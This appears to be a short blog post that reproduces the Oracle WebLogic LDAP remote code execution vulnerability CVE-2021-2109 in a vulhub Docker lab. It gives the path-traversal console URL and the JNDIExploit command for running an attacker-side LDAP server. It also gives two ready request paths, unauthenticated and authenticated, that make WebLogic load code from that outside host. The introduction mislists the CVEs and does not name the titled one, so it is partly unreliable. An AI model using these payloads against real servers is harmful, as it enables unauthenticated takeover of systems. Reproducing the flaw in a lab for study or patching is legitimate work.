Post

Weblogic Ldap Remote Code Execution Vulnerability Cve 2021 2109

Weblogic Ldap Remote Code Execution Vulnerability Cve 2021 2109

Weblogic LDAP Remote Code Execution Vulnerability CVE-2021-2109

Vulnerability Description

On January 20, 2021, Green Network Technology Monitor discovered that Oracle officially released the Critical Patch Update announcement for January 2021. A total of 329 vulnerabilities of varying degrees were fixed, including 7 serious vulnerabilities affecting WebLogic (CVE-2021-1994, CVE-2021-2047, CVE-2021-2064, CVE-2021-2108, CVE-2021-2075, CVE-2019-17195, CVE-2020-14756). Unauthenticated attackers can achieve remote code execution through this vulnerability.

Vulnerability Impact

WebLogic Server 10.3.6.0.0

WebLogic Server 12.1.3.0.0

WebLogic Server 12.2.1.3.0

WebLogic Server 12.2.1.4.0

WebLogic Server 14.1.1.0.0

Environment construction

git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2020-14882
docker-compose up -d

Visit https://xxx.xxx.xxx.xxx:7001 and it’s normal

img

Vulnerability reappears

Visit the URL https://xxx.xxx.xxx.xxx:7001/console/css/%2e%2e%2f/consolejndi.portal

img

If this page is not authorized to access and it may have a vulnerability within the scope of impact, download the LDAP startup script required for the vulnerability attack

img

Download to server to start

1
java -jar JNDIExploit-v1.11.jar -i xxx.xxx.xxx.xxx (服务器地址)

img

Then execute the command without authorization in Weblogic

/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)

</a-alert>


img

You can use this POC when logging in to the background. If you are not authorized, use the above

/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)
This post is licensed under CC BY 4.0 by the author.